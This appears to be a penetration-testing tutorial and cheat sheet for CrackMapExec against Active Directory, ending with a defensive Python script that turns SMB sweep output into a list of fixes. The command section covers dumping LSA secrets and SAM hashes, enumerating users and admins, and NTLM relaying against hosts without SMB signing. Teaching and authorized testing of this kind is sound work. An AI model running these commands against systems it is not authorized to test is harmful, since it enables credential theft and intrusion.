CrackMapExec in Kali Linux

CrackMapExec, often abbreviated as CME, is a powerful post-exploitation and penetration testing tool included in Kali Linux that is widely used for assessing large Active Directory networks. It acts as a Swiss army knife for network reconnaissance, credential validation, and exploitation by automating many common tasks that attackers and security professionals face during engagements. CME is particularly useful because it allows testers to quickly determine the reach of compromised credentials, identify systems that may be vulnerable, and interact with network services such as SMB, RDP, WinRM, and more, all from a single interface. This makes it invaluable in red team operations where efficiency and stealth are essential.

Beyond simple credential testing, CrackMapExec can execute commands remotely, dump password hashes, enumerate shares, and even deploy payloads across multiple hosts in a domain environment. Its ability to scale across large enterprise networks makes it a go-to tool for simulating real-world attacker behavior and identifying security weaknesses before adversaries can exploit them. While powerful, CME is meant to be used ethically within authorized penetration testing or security auditing contexts, as misuse of the tool could result in unauthorized access to sensitive systems and data.

You must have a user's password or hash to use this utility.

CrackMapExec Commands

<!-- How to install -->
sudo apt install crackmapexec

<!-- Find all computers -->
crackmapexec smb ip-range/24

<!-- Get list of all users in domain (May not work) -->
crackmapexec smb ip-range/24 -u '' -p ''

<!-- Once you have admin rights - see who is logged in -->
crackmapexec smb target-ip -u username -p password --loggedon-users

<!-- If you are workstation admin - dump LSA (Local Security Authority) secrets -->
crackmapexec smb target-ip -u username -p password --lsa

<!-- Find all computers the user has admin rights on -->
crackmapexec smb ip-range/24 -u username -d domain-name.local -p password

<!-- Dump the SAM file -->
crackmapexec smb ip-range/24 -u username -d domain-name.local -p password --sam


<!-- Port-scan the Domain Controller for open ports (-Pn skips host discovery, so the scan runs even if ping is blocked) -->
nmap -Pn <target IP>

<!-- Get SMB info on Domain Controller -->
crackmapexec smb <target IP>

<!-- Check which devices have SMB enabled -->
crackmapexec smb 192.168.x.1-192.168.x.254

<!-- Go after any computer with (signing:False) -->
impacket-ntlmrelayx -t smb://target-ip -smb2support

<!-- Check if LDAP signing (secured LDAP) is enforced -->
crackmapexec ldap <IP> -M ldap-signing

<!-- Get domain admins -->
crackmapexec smb <ip> -u <username> -p <pass> --groups 'Domain Admins'

<!-- Get admin groups -->
crackmapexec ldap <ip> -u <username> -p <pass> --admin-count

<!-- Get machine account quotas -->
crackmapexec ldap <IP> -u <username> -p <PASS> -M MAQ
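The SMB sweep above prints one line per host with `(signing:...)` and `(SMBv1:...)` flags, and the `(signing:False)` hosts are exactly the ones a tester relays against. The script below is an added example, not part of this page or of the CrackMapExec project: it parses that output into a remediation list so the same scan doubles as a hardening report for the blue team. The line layout it expects (`SMB  ip  port  hostname  [*] banner (name:..) (domain:..) (signing:..) (SMBv1:..)`) is CME's default SMB output; the four sample hosts are constructed and do not correspond to real systems.

```python
import re
from dataclasses import dataclass

# Constructed sample of a "crackmapexec smb <range>" sweep. Hosts and IPs are
# made up; only the column/flag layout follows CME's default SMB output.
SAMPLE_OUTPUT = """\
SMB         10.10.10.5      445    DC01             [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         10.10.10.21     445    WS-FINANCE01     [*] Windows 10.0 Build 19041 x64 (name:WS-FINANCE01) (domain:corp.local) (signing:False) (SMBv1:False)
SMB         10.10.10.37     445    FILESRV02        [*] Windows Server 2012 R2 Build 9600 x64 (name:FILESRV02) (domain:corp.local) (signing:False) (SMBv1:True)
SMB         10.10.10.40     445    PRINT01          [*] Windows 7 Professional 7601 Service Pack 1 x64 (name:PRINT01) (domain:corp.local) (signing:False) (SMBv1:True)
"""

# One CME SMB result line: protocol, IP, port, hostname, "[*]", then the banner.
LINE_RE = re.compile(
    r"^SMB\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<port>\d+)\s+(?P<host>\S+)\s+"
    r"\[\*\]\s+(?P<banner>.*)$"
)
# The "(key:value)" flags CME appends to the banner.
FLAG_RE = re.compile(r"\((?P<key>[^:()]+):(?P<val>[^)]*)\)")


@dataclass
class SmbHost:
    ip: str
    hostname: str
    domain: str
    os_banner: str
    signing: bool   # True when the server *requires* SMB signing
    smbv1: bool     # True when the legacy SMBv1 dialect is still enabled

    def findings(self):
        """Weaknesses a defender should fix on this host, with the remediation."""
        f = []
        if not self.signing:
            f.append("SMB signing not required: enable 'Microsoft network server: "
                     "Digitally sign communications (always)' via GPO")
        if self.smbv1:
            f.append("SMBv1 enabled: disable the SMB1 protocol feature")
        return f


def parse_cme_smb(text):
    """Parse CME SMB sweep output into SmbHost records; non-matching lines are skipped."""
    hosts = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        banner = m.group("banner")
        flags = {k.strip().lower(): v.strip() for k, v in FLAG_RE.findall(banner)}
        hosts.append(SmbHost(
            ip=m.group("ip"),
            hostname=m.group("host"),
            domain=flags.get("domain", ""),
            os_banner=banner.split(" (", 1)[0].strip(),
            signing=flags.get("signing", "").lower() == "true",
            smbv1=flags.get("smbv1", "").lower() == "true",
        ))
    return hosts


def triage(text):
    """Map hostname -> list of findings for every host that needs remediation."""
    return {h.hostname: h.findings() for h in parse_cme_smb(text) if h.findings()}


def report(text):
    """Human-readable remediation list, ordered worst-first by number of findings."""
    lines = []
    for host in sorted(parse_cme_smb(text), key=lambda h: -len(h.findings())):
        issues = host.findings()
        if not issues:
            continue
        lines.append(f"{host.hostname} ({host.ip}, {host.os_banner})")
        lines.extend(f"  - {issue}" for issue in issues)
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(SAMPLE_OUTPUT))
```

Pipe a real sweep in with `crackmapexec smb <range> | python3 triage.py` (after swapping `SAMPLE_OUTPUT` for `sys.stdin.read()`); the domain controller, which requires signing by default, drops out of the list and only the workstations and file servers that still accept unsigned SMB remain.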